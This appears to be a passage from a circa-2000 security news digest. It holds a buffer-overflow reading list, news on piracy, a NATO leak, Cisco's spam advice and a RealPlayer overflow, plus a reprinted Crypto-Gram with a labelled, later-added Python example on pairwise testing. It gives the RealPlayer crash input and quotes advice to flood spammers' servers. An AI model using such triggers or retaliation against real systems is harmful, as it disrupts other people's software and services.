"Smashing The Stack For Fun And Profit", Elias Levy (Aleph One)
http://www.phrack.com/search.phtml?view&article=p49-14

"How to write Buffer Overflows", dr. Mudge
ftp://ftp.technotronic.com/rfc/bufferoverflows.html

"The Tao of the Windows Buffer Overflow", Dildog
http://www.cultdeadcow.com/cDc_files/cDc-351/index.html

"Exploiting Windows NT4 Bufferoveruns; a case study: RASMAN.EXE", David Litchfield
http://packetstorm.securify.com/9905-exploits/ntbufferoveruns.txt

"W00w00 on Heap Overflows", w00w00 security
http://packetstorm.securify.com/docs/infosec/buffer-overflows/w00w00-heap-overflows.txt

@HWA

211.0 HNS:Apr 5th:PIRACY
~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by LogError Wednesday 5 April 2000 on 12:11 AM

Washington state, with an economy that has boomed along with Microsoft's, has launched a crackdown on state employees who illegally circulate pirated software on government computers.

Link: APB News
____________________________________________________

http://www.apbnews.com/newscenter/internetcrime/2000/04/04/software0404_01.html

----------

Microsoft's Home State Cracks Down on Piracy
Washington Governor's Order Targets Software Copying

April 4, 2000
By David Noack

OLYMPIA, Wash. (APBnews.com) -- Washington state, with an economy that has boomed along with Microsoft's, has launched a crackdown on state employees who illegally circulate pirated software on government computers. Gov.
Gary Locke signed an executive order Monday aimed at preventing the illegal acquisition and distribution of programs using state equipment or funds.

"We are working diligently to combat computer software piracy," Locke said. "As a major purchaser and user of computer software, Washington state government must set an example in acquiring and using legally licensed software."

Washington now becomes the fourth state to issue strict policies and guidelines dealing with software piracy in state government. The other states are California, Nevada and Colorado.

The executive order

The executive order directs all state agencies to take the following actions:

- Adopt procedures to prevent the unlawful acquisition, reproduction, distribution or transmission of computer software
- Establish procedures to ensure that computer software use complies with the law
- Take appropriate measures if contractors or financial assistance recipients use state funds to acquire, operate or maintain illegal software.

In addition to the illegality of having pirated software, Locke also cited economic concerns for issuing the order.

Estimates of 4,000 jobs lost

"Illegal software use has a very damaging impact on Washington's economy," Locke said. "We cannot tolerate counterfeiters who try to make a quick buck by pawning illegal software to honest consumers at the expense of Washington's taxpayers."

Computer industry estimates show pirated software costs Washington's economy almost 4,000 jobs annually and more than $200 million in lost wages.

The state is home to more than 7,000 high-technology businesses, including software developers, software training groups, and software and hardware service organizations. These businesses employ more than 76,000 people and pay more than $3.7 billion in annual wages.
Computer trade associations such as the Software Information Industry Association (SIIA) and the Business Software Alliance (BSA) have long argued that software piracy costs the industry billions annually and have called for more software auditing.

Peter Beruk, vice president of anti-piracy programs at the SIIA, said that an executive order dealing with software piracy sends a message to the state bureaucracy that this kind of behavior won't be tolerated.

"It helps having a governor issuing an executive order like this," Beruk said. "It puts notice on people who are responsible for this to do the right thing. It gives them, the people actually responsible for doing this, ... an important job. The governor has directed us to do this."

Officials from the Microsoft Corp. and Adobe Systems Inc. were quick to applaud the governor's actions to protect intellectual property rights in Washington state.

On the federal level, President Clinton issued a national executive order against software piracy in October 1998, and other countries around the globe ranging from China to Norway to Colombia have issued such intellectual property directives.

A leadership role

Locke will speak about the executive order today at a meeting of the Government Leaders Conference, where, in an address on "Digital Government," he will highlight why the protection of intellectual property is important in today's economy.

"We're encouraged to see Washington continue to take a state leadership role in addressing the issue of intellectual property rights, as both consumers and governments move into the digital era where the online world becomes the norm for business transactions," said Anne Murphy, corporate attorney at Microsoft.

The head of Washington's software industry also backed the governor's efforts to protect intellectual property.

"Much focus over the years has been about foreign software piracy, obscuring the fact that piracy is a rampant domestic issue," said Kathleen Wilcox, president and chief executive officer of the Washington Software Alliance.

Approximately 20 percent of the software used in Washington -- one out of every five copies -- has been illegally copied, according to a 1998 study by International Planning & Research Corp.

Pirate targets

Experts said that governments are often targets for software pirates, mainly due to the low-bid government procurement processes in place.

Because many illegitimate software manufacturers now advertise their products over the Internet -- where it is more difficult for consumers to distinguish genuine from illegal software -- it has become increasingly easy for customers at all levels to be deceived into believing that they are acquiring genuine software.

"Washington state residents clearly don't want their taxpayer dollars going toward pirated software or the organized crime rings that could be distributing it," Microsoft's Murphy said.

Last month, Colorado Gov. Bill Owens issued an executive order dealing with the use of legal, licensed computer software throughout the state government. The order applies to all state agencies, as well as all third parties doing business with the state.

"Government agencies are among the largest users of computer software and must set a positive example by mandating the use of legal and licensed software," said Becca Gould, the Business Software Alliance's vice president of public policy.

According to the Business Software Alliance, the use of illegal software costs nearly $11 billion annually -- $2.8 billion in the United States alone. In 1998, proliferation of illegal software in the United States resulted in the loss of 109,000 jobs, $4.5 billion in wages and nearly $991 million in tax revenue.
According to a recent industry study, the piracy rate in Colorado is 27 percent, resulting in lost jobs and tax revenues throughout the state.

David Noack is an APBnews.com staff writer (david.noack@apbnews.com)

@HWA

212.0 HNS:Apr 5th:BIGGEST PUBLIC-KEY CRYPTO CRACK EVER
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by LogError Wednesday 5 April 2000 on 12:05 AM

Certicom's ECC2k-108 Elliptic Curve Discrete Logarithm challenge has been broken! This was the largest public calculation ever to use a complex parallel algorithm. $5,000 dollars in winnings will be donated to the Free Software Foundation.

Link: Slashdot
____________________________________________________

http://slashdot.org/article.pl?sid

----------

(article vanished or like has gone or some shit - Ed)

@HWA

213.0 HNS:Apr 5th:GROUP APPEALS DVD CRYPTO INJUNCTION
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by LogError Wednesday 5 April 2000 on 12:02 AM

Continuing its California courtroom battle against the Digital Video Disk industry over DVD encryption codes, the Electronic Frontier Foundation has appealed an injunction granted against more than 50 Web site operators in January.

Link: Computer User
____________________________________________________

http://www.currents.net/newstoday/00/04/04/news7.html

----------

@HWA

214.0 HNS:Apr 5th:VIRUS BLOWS A HOLE IN NATO'S SECURITY
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by LogError Wednesday 5 April 2000 on 12:01 AM

The North Atlantic Treaty Organization has launched a full-scale investigation into how one of its top-secret documents ended up posted on the Internet. The Sunday Telegraph reports that an unknown virus is to blame for the posting of the nine-page document, detailing the alliance's rules of engagement in the southern Yugoslav province of Kosovo, on to the Net.
Link: Computer User
____________________________________________________
http://www.currents.net/newstoday/00/04/04/news3.html
----------

Daily News

Virus Blows a Hole in NATO's Security
By Steve Gold, Newsbytes
April 04, 2000

The North Atlantic Treaty Organization (NATO) has launched a full-scale investigation into how one of its top-secret documents ended up posted on the Internet. The Sunday Telegraph reports that an unknown virus is to blame for the posting of the nine-page document, detailing the alliance's rules of engagement in the southern Yugoslav province of Kosovo, on to the Net.

Press reports this morning say that NATO moved into full swing over the weekend after the British Ministry of Defence was alerted to the problem late last week. The Sunday Telegraph said that the top secret document was spotted by a London publishing house and reported to the relevant authority.

BBC news reports today, meanwhile, say that a virus may be to blame. NATO's Brussels headquarters said that a press briefing for the media is expected later today.

The Sunday Telegraph, meanwhile, quotes Jamie Shea, a senior spokesperson for NATO, as saying that, if the investigation shows that a NATO document has got into the public domain, "it will be a matter of great concern to us." He added, "These are sensitive NATO documents. We would like to keep them classified and prevent them being compromised."

Newsbytes' sources say that the document posted to the Net included NATO's Rules of Engagement for Land Operations, which cover the circumstances under which "appropriate measures, including the use of deadly force," may be used.

The Sunday Telegraph quotes an unnamed person at the London Publishing company as saying that two people tried to open up a new document on a PC and, instead, the NATO Kosovo document started to scroll up.
"The next thing I knew, I was in a meeting around lunchtime when a message came from reception saying, `Your guests have arrived.'" On returning to work, the member of staff was interviewed by two military intelligence officers in plain clothes, who said words to the effect of, "'This is something we are very worried about,' and started to ask questions."

Newsbytes' sources suggest that the NATO document was top secret classified material, but the classification was changed to "restricted" over the weekend to prevent further embarrassment.

Sources also suggest that the document was posted to a Usenet group, but was quickly deleted by a Ministry of Defence autobot, a software agent that autodeletes questionable Usenet postings from the servers of Usenet-enabled Internet service providers (ISPs) around the world.

Graham Cluley, head of corporate communications with Sophos Anti-Virus, was not surprised by the reports that a virus is to blame for the NATO security breach. He pointed to worm payloads such as the infamous Melissa virus as indicative of how easy it is to trigger an Internet posting without the permission of the host PC operator.

"These latest security breaches highlight that no one is immune to security scares in any form," he said, adding that, if NATO can be hit by a virus, "then it should serve as a salutary reminder to all of us that we all need to be vigilant against computer crime and ensure the deployment of quality, up-to-date anti-virus and encryption software.

"In this particular case, NATO has suffered an embarrassment, but viruses like Melissa have already shown us how it is possible for a virus to pass on confidential material to thousands via just a few hops in an e-mail address book," he said.

"Perhaps more troubling though, is the fact that these viruses appear to be causing much more serious harm than a virus whose payload is a playful cartoon or Dr. Who quote," he added.

Sophos' Web site is at http://www.sophos.com .
Reported by Newsbytes.com

@HWA

215.0 HNS:Apr 4th:FIGHT SPAM WITH SPAM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Tuesday 4 April 2000 on 8:40 AM

Cisco Systems is urging victims of spam to take the law into their own hands and deliver their own form of vengeance to combat unwanted e-mails. This was taken from booklet 'The Easy Guide to Network Security', which could be downloaded from their UK site.

Link: The Register
____________________________________________________
http://www.theregister.co.uk/000404-000001.html
----------

(Now this is a real dumb thing for a reputable company to suggest ... - Ed)

Posted 04/04/2000 7:02am by Tim Richardson

Cisco tells spam victims to reply with abusive emails

Cisco Systems is urging victims of spam to take the law into their own hands and deliver their own form of vengeance to combat unwanted e-mails.

It claims the best way to deal with spammers is to reply with abusive e-mails and to dump massive files that will clog up their servers.

It's the online equivalent to blowing a whistle down the phone line when dealing with nuisance calls - or flicking the Vs at a motorist before chasing them for five miles after they've carved you up.

The advice is contained in a booklet The Easy Guide to Network Security, which is also published in an ungainly PDF file on Cisco's UK Web site.

Under the heading "Spam", it reads: "Spam is usually harmless, but it can be a nuisance, taking up time and storage space. The solution is to flame the perpetrators by sending them abusive messages, or to reply by dumping a very large and useless file on their Web server."

It's not clear whether this is a corporate-wide policy or just applies to the hard noses in Britain.

It's certainly a different approach from that pursued by British ISP, BiblioTech, which goes to extreme lengths to chase spammers through the courts.

Question is, have you received any spam from Cisco?
If so, sounds like they're inviting you to take action. And if you can orchestrate it with other spam victims, then you could even manufacture a denial of service attack. ®

@HWA

216.0 HNS:Apr 4th:REALPLAYER BUFFER OVERFLOW
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Tuesday 4 April 2000 on 8:10 AM

There is a buffer overflow in the Win32 RealPlayer Basic client, versions 6 and 7. This appears to occur when >299 characters are entered as a 'location' to play, such as http://aaaaa..... with 300 a's. If it is embedded in an HTML page, Internet Explorer also crashes.

Link: Bugware
____________________________________________________
http://net-security.org/cgi-bin/bugs/fullnews.cgi?newsid954828462,3289 8,
----------

@HWA

217.0 ISN:Mar 18th:Serbs hacked Britain's top-secret military computers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From: William Knowles

Sounds like complete FUD to me, but I wouldn't put it past any country nowadays. -WK

http://express.lineone.net/express/00/02/27/news/n0220serb-d.html

By Ken Hyder and Nick Anning

Serb experts hacked into Britain's top-secret military computer systems during the Kosovo conflict last year, the Sunday Express has learned.

In response, MI5 has been put in charge of improving Britain's defences against cyber attack.

It is understood that both sides engaged in covert cyber war alongside the conventional warfare and that British agents successfully hacked into Serb computers. Both sides tried to plant computer viruses into military systems.

The Serb attacks focused on computers handling the messaging systems used by the Ministry of Defence to communicate between headquarters in the UK and military units in the field.
The cyber strike persuaded the Government that an all-out attack on our computer systems could bring the country to a standstill.

Working alongside MI5 are computer experts from GCHQ in Cheltenham, specialist army units such as the SAS, and highly experienced private sector consultants. The police National Crime Squad will also be involved.

A source admitted: "This kind of warfare is a deadly innovation. One super-hacker with just a laptop and mobile phone could wreak an amazing amount of damage in minutes. There are so many targets for us to defend - but the enemy hacker just needs to pick one and succeed."

The SAS has carried out dummy attacks on key installations such as the National Grid and air-traffic control. Now, as well as testing out a location's physical defences, they take a civilian computer specialist with them.

ISN is sponsored by Security-Focus.COM

@HWA

218.0 March 15th: CRYPTOGRAM newsletter
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: Bruce Schneier

CRYPTO-GRAM

March 15, 2000

by Bruce Schneier
Founder and CTO
Counterpane Internet Security, Inc.
schneier@counterpane.com
http://www.counterpane.com

A free monthly newsletter providing summaries, analyses, insights, and commentaries on computer security and cryptography.

Back issues are available at http://www.counterpane.com. To subscribe or unsubscribe, see below.

Copyright (c) 2000 by Counterpane Internet Security, Inc.

** *** ***** ******* *********** *************

In this issue:
Kerberos and Windows 2000
Counterpane -- Featured Research
News
AES News
Counterpane Internet Security News
Software as a Burglary Tool
The Doghouse: The Virginia Legislature
Software Complexity and Security
Comments from Readers

** *** ***** ******* *********** *************

Kerberos and Windows 2000

Kerberos is a symmetric-key authentication scheme. It was developed at MIT as part of their Project Athena in the 1980s -- the protocol was published in October 1988 -- and has been implemented on various flavors of UNIX.
The current version is Kerberos Version 5, which corrected some security vulnerabilities in Version 4. It's never taken over the authentication world, but it is used in many networks. These days, the Internet Engineering Task Force (IETF) controls the specification for Kerberos.

Kerberos is a client-server authentication protocol. (_Applied Cryptography_ goes into the protocol in detail.) For the point of this article, remember that there is a secure Kerberos server on a network. Clients log into the Kerberos server and get secure "tickets." The clients can use these tickets to log onto other servers on the network: file servers, databases, etc.

Kerberos is now part of Microsoft Windows 2000, sort of. The issue is that Microsoft has made changes to the protocol to make it noninteroperable with the Kerberos standard, and with any products that implement Kerberos correctly.

Specifically, the incompatibility has to do with something called the "data authorization field" in the Kerberos messages. All major Kerberos implementations leave the field blank. The new Microsoft implementation does not; it uses the field to exchange access privileges between the Kerberos server and the client.

There are two ways to look at this:

o Since the field has no specific uses in the protocol (and no one else uses it), the fact that Microsoft is using the field is harmless.

o Because Microsoft is refusing to publish details about its proprietary use of the field, they are harming interoperability and standardization. Other Kerberos vendors cannot directly support Windows 2000 clients. Even worse, Microsoft bypassed the IETF in this process (there's a procedure you're supposed to follow if you want to enhance, deviate from, or modify an IETF standard).

On the surface, this is just nasty business practices.
If you're a company that has invested in a UNIX-based Kerberos authentication system and you want to support Windows 2000 desktops, your only real option is to buy a Windows 2000 Kerberos server and pay for the integration. I'm sure this is what Microsoft wants.

My worry is more about the security. Protocols are very fragile; we've learned that time and time again. You can't just make changes to a security protocol and assume the changed protocol will be secure. Microsoft has taken the Kerberos protocol -- a published protocol that has gone through over a decade of peer review -- and has made changes in it that affect security. Even worse, they have made those changes in secret and have not released the details to the world.

Don't be fooled. The Kerberos in Windows 2000 is not Kerberos. It does not conform to the Kerberos standard. It is Kerberos-like, but we don't know how secure it is.

Kerberos Web page:

IETF Specification:

Microsoft Kerberos information:
Windows 2000 Kerberos Authentication white paper --
Introduction to Windows 2000 Security Services --
Guide to Kerberos Interoperability --

Article by David Chappell about Kerberos and Windows 2000 --

** *** ***** ******* *********** *************

Counterpane -- Featured Research

"A Performance Comparison of the Five AES Finalists"

B. Schneier and D. Whiting, Third AES Candidate Conference, 2000, to appear.

In 1997, NIST announced a program to develop and choose an Advanced Encryption Standard (AES) to replace the aging Data Encryption Standard (DES). NIST chose five finalists in 1999. We compare the performance of the five AES finalists on a variety of common software platforms: current 32-bit CPUs (both large microprocessors and smaller, smart card and embedded microprocessors) and high-end 64-bit CPUs. Our intent is to show roughly how the algorithms' speeds compare across a variety of CPUs.
Then, we give the maximum rounds cryptanalyzed for each of the algorithms, and re-examine all the performance numbers for these variants. We then compare the algorithms again, using the minimal secure variants as a way to more fairly align the security of the five algorithms.

** *** ***** ******* *********** *************

News

More commentary on the ethics of publicizing vulnerabilities:

An opinion on DDS attacks and the CD Universe fiasco:

There's a new DSS standard:
Text --
PDF --

BAIT, DIRT, and other law-enforcement hacker tools. Some of the PR fluff sounds too good to be true.

H&R Block insecurity:

The worst security product is the one that isn't used. Here are the results of a PGP usability study. Most people can't figure out how to use it. Some sent e-mail out unencrypted, believing it was secure.

Novell published a "security flaw in MS Active Directory Services" the day before the MS launch of Windows 2000. Microsoft published a response shortly thereafter. Both documents are full of marketing spin. Russ Cooper has written an objective description of the non-issue:

Good security software: a command-line tool for statically scanning C and C++ source code for security vulnerabilities. It's called ITS4.

Mixter's paper on cracking:

Excellent essay on the difference between hackers and vandals:

Commentaries on distributed denial-of-service attacks:

Usernames and passwords for sale:

Sony PlayStation 2 is being held up for export (from Japan) due to crypto in the system:

Navajo code-talking GI Joe doll:

More speculation about Echelon:

Interesting use of a honey pot by the San Diego Supercomputer Center (or, SDSC Hacks the Hackers):

** *** ***** ******* *********** *************

AES News

The big AES news is the week of 10-14 April, 2000, in New York. Monday, Tuesday, and Wednesday are the 7th Fast Software Encryption workshop (FSE 2000). Thursday and Friday are the 3rd AES Candidate Conference (AES3). Both are in the New York Hilton and Towers.
FSE 2000 will have several excellent papers on the AES candidates (new attacks on MARS, RC6, Rijndael, and Serpent), and AES3 will have nothing but. The papers for FSE 2000 have been selected, and are listed on the Web site. The papers for AES3 have not been announced yet. (The submission deadline for both conferences is long past.)

Come, be a part of cryptography history. It'll be fun.

FSE 2000:

AES3:

** *** ***** ******* *********** *************

Counterpane Internet Security News

Bruce Schneier was interviewed in Business Week:

** *** ***** ******* *********** *************

Software as a Burglary Tool

This is a weird one. Two people in Minneapolis who allegedly stole information from their employers were charged with the possession of a "burglary tool" -- L0phtcrack, the program that automatically breaks Windows passwords.

The ramifications of this are unclear. There are some burglary tools that you can't carry unless you are a licensed professional (certain lockpicking tools, for example); just having them is illegal. But screwdrivers and bolt cutters can also be burglary tools if they are used with the intent to commit a crime. What it means to me is that the law is getting serious about this.

** *** ***** ******* *********** *************

The Doghouse: The Virginia Legislature

They recently passed the Uniform Computer Information Transactions Act (UCITA). It's deeply disturbing. It could be subtitled "The Software Industry Wish List" for the amount of control (and absence of accountability) it gives UNDER LAW to software distributors. Under the UCITA, Microsoft not only doesn't have to fix any of the 63,000 Windows 2000 bugs, it wouldn't even have to tell you any of them existed. It could also disable the OS of anyone it wants for essentially any reason it wanted (e.g., failing to abide by the license terms which restrict you from any public mention of apparent bugs in the software). The governor has not signed the bill into law yet, but he is expected to.
** *** ***** ******* *********** *************

Software Complexity and Security

The future of digital systems is complexity, and complexity is the worst enemy of security.

Digital technology has been an unending series of innovations, unintended consequences, and surprises, and there's no reason to believe that will stop anytime soon. But there is one thing that has held constant through it all, and it's that digital systems have gotten more complicated.

We've seen it over the past several years. Microprocessors have gotten more complex. Operating systems have gotten more complex. Computers have gotten more complex. Networks have gotten more complex. Individual networks have combined, further increasing the complexity. I've said it before, but it's worth repeating: The Internet is probably the most complex machine mankind has ever built. And it's not getting any simpler anytime soon.

As a consumer, I think this complexity is great. There are more choices, more options, more things I can do. As a security professional, I think it's terrifying. Complexity is the worst enemy of security. This has been true since the beginning of computers, and is likely to be true for the foreseeable future. And as cyberspace continues to get more complex, it will continue to get less secure. There are several reasons why this is true.

The first reason is the number of security bugs. All software contains bugs. And as the complexity of the software goes up, the number of bugs goes up. And a percentage of these bugs will affect security.

The second reason is the modularity of complex systems. Complex systems are necessarily modular; there's no other way to handle the complexity than by breaking it up into manageable pieces. We could never have made the Internet as complex and interesting as it is today without modularity. But increased modularity means increased security flaws, because security often fails where two modules interact.
We've already seen examples of this as everything becomes Internet-aware. For years we knew that Internet applications like sendmail and rlogin had to be secure, but the recent epidemic of macro viruses shows that Microsoft Word and Excel need to be secure. Java applets not only need to be secure for the uses they are intended, they also need to be secure for any other use an attacker might think of. Photocopiers, maintenance ports on routers, mass storage units: these can all be made Internet-aware, with the associated security risks. Rogue printer drivers can compromise Windows NT. Malicious e-mail attachments can tunnel through firewalls. Convenience features in Microsoft Outlook can compromise security.

The third reason is the increased testing requirements for complex systems. I've talked elsewhere about security and failure testing. The only reasonable way to test the security of a system is to perform security evaluations on it. However, the more complex the system is, the harder a security evaluation becomes. A more complex system will have more security-related errors in the specification, design, and implementation. And unfortunately, the number of errors and the difficulty of evaluation does not grow in step with the complexity, but in fact grows much faster.

For the sake of simplicity, let's assume the system has ten different settings, each with two possible choices. Then there are 45 different pairs of choices that could interact in unexpected ways, and 1024 different configurations altogether. Each possible interaction can lead to a security weakness, and must be explicitly tested. Now, assume that the system has twenty different settings. This means 190 different pairs of choices, and about a million different configurations. Thirty different settings means 435 different pairs and a billion different configurations. Even slight increases in the complexity of systems mean an explosion in the number of different configurations . . . any one of which could hide a security weakness.

The increased number of possible interactions creates more work during the security evaluation. For a system with a moderate number of options, checking all the two-option interactions becomes a huge amount of work. Checking every possible configuration is effectively impossible. Thus the difficulty of performing security evaluations also grows very rapidly with increasing complexity. The combination of additional (potential) weaknesses and a more difficult security analysis unavoidably results in insecure systems.

The fourth reason is that the more complex a system is, the harder it is to understand. There are all sorts of vulnerability points -- human-computer interface, system interactions -- that become much larger when you can't keep the entire system in your head.

The fifth (and final) reason is the difficulty of analysis. The more complex a system is, the harder it is to do this kind of analysis. Everything is more complicated: the specification, the design, the implementation, the use. And as we've seen again and again, everything is relevant to security analysis.

A more complex system loses on all fronts. It contains more weaknesses to start with, its modularity exacerbates those weaknesses, it's harder to test, it's harder to understand, and it's harder to analyze.

It gets worse: This increase in the number of security weaknesses interacts destructively with the weakest-link property of security: the security of the overall system is limited by the security of its weakest link. Any single weakness can destroy the security of the entire system.

Real systems show no signs of becoming less complex. In fact, they are becoming more complex faster and faster. Microsoft Windows is a poster child for this trend to complexity. Windows 3.1, released in 1992, had 3 million lines of code; Windows 95 has 15 million and Windows 98 has 18 million.
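The counting argument from the essay (ten binary settings give 45 pairs of choices and 1024 configurations; twenty give 190 and about a million), carried into code as an added example that is not part of Crypto-Gram. It also goes one step beyond the text: a greedy strength-2 covering array (this example's own choice of technique, with its own function names) shows how few configurations are needed to exercise every pairwise interaction at least once, which is why pairwise checks stay feasible long after exhaustive checks do not.

```python
"""Counting the interactions a security evaluation has to cover.

Added example, not part of Crypto-Gram: for n settings with two choices
each, the essay counts C(n, 2) pairs of settings and 2**n configurations.
pairwise_covering_configs() goes one step further with a greedy covering
array (this example's own technique) to show how few configurations
suffice to exercise every pairwise interaction at least once.
"""
from itertools import combinations, product
from math import comb
from typing import Dict, FrozenSet, List, Sequence, Set, Tuple

Config = Tuple[int, ...]
# (setting_a, value_a, setting_b, value_b): one two-setting interaction
Pair = Tuple[int, int, int, int]


def interaction_counts(n_settings: int, choices: int = 2) -> Tuple[int, int]:
    """(pairs of settings, total configurations). Ten binary settings
    give the essay's (45, 1024); twenty give (190, 1048576)."""
    return comb(n_settings, 2), choices ** n_settings


def all_pairs(n_settings: int, choices: int = 2) -> Set[Pair]:
    """Every two-setting interaction an evaluation would have to exercise:
    C(n, 2) setting pairs times choices**2 value combinations."""
    return {
        (a, va, b, vb)
        for a, b in combinations(range(n_settings), 2)
        for va, vb in product(range(choices), repeat=2)
    }


def pairs_covered_by(config: Config) -> FrozenSet[Pair]:
    """The C(n, 2) interactions that one concrete configuration exercises."""
    return frozenset(
        (a, config[a], b, config[b])
        for a, b in combinations(range(len(config)), 2)
    )


def pairwise_covering_configs(n_settings: int, choices: int = 2) -> List[Config]:
    """Greedy strength-2 covering array: keep picking the configuration
    that exercises the most still-untested pairs. Enumerates all
    choices**n candidates, so it is meant for the essay's small n."""
    uncovered = all_pairs(n_settings, choices)
    covered: Dict[Config, FrozenSet[Pair]] = {
        c: pairs_covered_by(c) for c in product(range(choices), repeat=n_settings)
    }
    chosen: List[Config] = []
    while uncovered:
        # Every uncovered pair is exercised by some candidate, so each
        # round makes progress and the loop terminates.
        best = max(covered, key=lambda c: len(covered[c] & uncovered))
        chosen.append(best)
        uncovered -= covered[best]
    return chosen


def verify_pairwise_coverage(configs: Sequence[Config], n_settings: int,
                             choices: int = 2) -> bool:
    """True when the given configurations exercise every pairwise interaction."""
    exercised: Set[Pair] = set()
    for c in configs:
        exercised |= pairs_covered_by(c)
    return exercised == all_pairs(n_settings, choices)


if __name__ == "__main__":
    for n in (10, 20, 30):
        pairs, total = interaction_counts(n)
        print(f"{n} settings: {pairs} pairs of choices, {total} configurations")
    cfgs = pairwise_covering_configs(10)
    print(f"{len(cfgs)} configurations exercise all {45 * 4} pairwise "
          f"interactions of 10 binary settings (vs 1024 for every configuration)")
```

Pairwise coverage only finds weaknesses that depend on at most two settings; the essay's point stands for higher-order interactions, whose count grows even faster.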
The original Windows NT (also 1992) had 4 million lines of code; NT 4.0 (1996) has 16.5 million. In 1998, Windows NT 5.0 was estimated to have 20 million lines of code; by the time it was renamed Windows 2000 (in 1999) it had between 35 million and 60 million lines of code, depending on who you believe. (As points of comparison, Solaris has held pretty stable at about 7 to 8 million lines of code for the last few releases, and Linux, even with the addition of X Windows and Apache, is still under 5 million lines of code.)

The size of Windows 2000 is absolutely amazing, and it will have more security bugs than Windows NT 4.0 and Windows 98 combined. In its defense, Microsoft has claimed that it spent 500 people-years to make Windows 2000 reliable. I only reprint this number because it will serve to illustrate how inadequate 500 people-years is.

The networks of the future, necessarily more complex, will be less secure. The technology industry is driven by demand for features, for options, for speed. There are no standards for quality or security, and there is no liability for insecure software. Hence, there is no economic incentive to create high quality. Instead, there is an economic incentive to create the lowest quality the market will bear. And unless customers demand higher quality and better security, this will never change.

I see two alternatives. The first is to recognize that the digital world will be one of ever-expanding features and options, of ever-faster product releases, of ever-increasing complexity, and of ever-decreasing security. This is the world we have today, and we can decide to embrace it knowingly.

The other choice is to slow down, to simplify, and to try to add security. Customers won't demand this -- the issues are too complex for them to understand -- so a consumer advocacy group is required.
I can easily imagine an FDA-like organization for the Internet, but it can take a decade to approve a new prescription drug for sale, so this solution might not be economically viable.

I repeat: complexity is the worst enemy of security. Secure systems should be cut to the bone and made as simple as possible. There is no substitute for simplicity. Unfortunately, simplicity goes against everything our digital future stands for.

** *** ***** ******* *********** *************

Comments from Readers

From: Shawn Hernan
Subject: Full Disclosure

I was intrigued by your recent series of editorials in Crypto-Gram regarding full-disclosure, and especially, CERT. I am writing to respond to the article. Some of your criticisms of CERT are valid, and I agree with them; but I wanted to point out a couple of things that you may not realize about our current practices.

When deciding what to publish and when, we use a variety of different criteria. First, whatever we publish has to be *true* -- we go to great lengths to validate and verify everything we say in an advisory, and you can imagine some of the arguments that ensue over what is "true." Second, as a rule of thumb, our advisories are generally about very serious problems. We have a formal metric that we use to attempt to put vulnerabilities on a linear scale of "severity" and we use that as a first-order estimate of the gravity of the problem, and use our experience as the final judge. Generally, the problems issued in advisories are in the 90th percentile of this scale (internally called the "threat metric"). Third, although it may have been true in the past, it has never been the case in my time here (about 4 years now) that our publication schedule was dependent on all (or even any) of the fixes being available. We certainly prefer to have fixes available at publication time, but if we discover that a vulnerability is being exploited we will publish regardless of the availability of any fixes or patches.
My team (the vulnerability handling team) works very closely on a daily basis with the incident response team to understand if a vulnerability is being exploited.

Given all that, I am trying to find responsible, practical ways to publish more information about vulnerabilities in a variety of forms. We are a relatively small organization, and I'm not willing to sacrifice truth for expediency.

From: Ryan Russell
Subject: Distributing Exploits

You're still not totally consistent in what you say:

>Third, I believe that it is irresponsible, and possibly
>criminal, to distribute exploits.

You've already acknowledged that that's what it takes to get action.

>Reverse-engineering security systems, discovering
>vulnerabilities, and writing research papers about them
>benefits research; it makes us smarter at designing secure
>systems. Distributing exploits just make us more vulnerable.

You acknowledge your behavior being inconsistent with your words, which is neither here nor there. It not only often takes an exploit, but it takes a press release sometimes. Thievco released an "exploit" to decode Netscape passwords a year and a half ago. Netscape did nothing. RST Corp. did the same, with a press release. That got Netscape's attention.

>For example, Mixter is a German hacker who wrote the
>Tribal Flood Network tool used in some of the distributed
>denial-of-service attacks. I believe he has a lot to answer
>for. His attack tool served no good.

Not true. Were it not for him, we'd probably be looking at mystery tools that were being used that we didn't have the source for, and couldn't as easily analyze. Mixter has combated much FUD by showing us exactly the type of thing that can be used, so that the reporters couldn't run off and tell the public that the evil hackers have superweapons the security experts know nothing about.

>It enabled criminals and cost a lot of companies a lot of
>money. Its existence makes networks less secure.
As you say, like any tool, it enables both good and bad guys. As you've pointed out, the security problem was already there, the tools just highlight it.

Let me speak to the subtext of your rant against Mixter. Some people think Mixter may deserve some punishment. I don't, but I can see some of the logic. Really, I think if anyone deserves punishment, it's the guys who used the tool.

Did Mixter and even the attackers actually do anything in the spirit of full disclosure? Yes. We've been complaining for years about the spoofing problem, and expecting ISPs to do filtering. Nothing has happened. Mixter put out his tool. Some meetings to discuss DDoS happened. No actual change to behavior, but there was some amount of advanced planning, which was good preparation. Finally, some person (yes, criminal) put their neck on the line and actually used them. They didn't take down the security sites to make them look bad. They didn't go after the government. They went after e-commerce, which I have to assume was designed for maximum reaction. I think we'll get some action now.

From: Brian Bartholomew
Subject: Publishing exploits

> Second, I believe in giving the vendor advance notice. CERT took
> this to an extreme, sometimes giving the vendor years to fix the
> problem. I'd like to see the researcher tell the vendor that he
> will publish the vulnerability in a month, or three weeks (no fair
> giving the vendor just seven days to fix the problem). Hopefully
> the vulnerability announcement can occur at the same time as the
> patch announcement. This benefits everybody.

Whatever CERT's motivations were, they had the effect of increasing user trust (because a new sheriff is in town) while decreasing trustability (because they sat on vulnerabilities users handed off to them). This is backwards, in two places.

I prefer the following approach: announce existence of vulnerability and promise a kiddy script in a month; wait a month for vendor to react; publish kiddy script.
> Publishing vulnerabilities in critical systems that cannot be easily
> fixed and whose exploitation will cause serious harm (e.g., the air
> traffic control system) is bad.

Publishing is *very important* in these cases so the stakeholders know to reduce their trust in these systems. If air traffic control is vulnerable, tell me so I can stop taking airplanes!

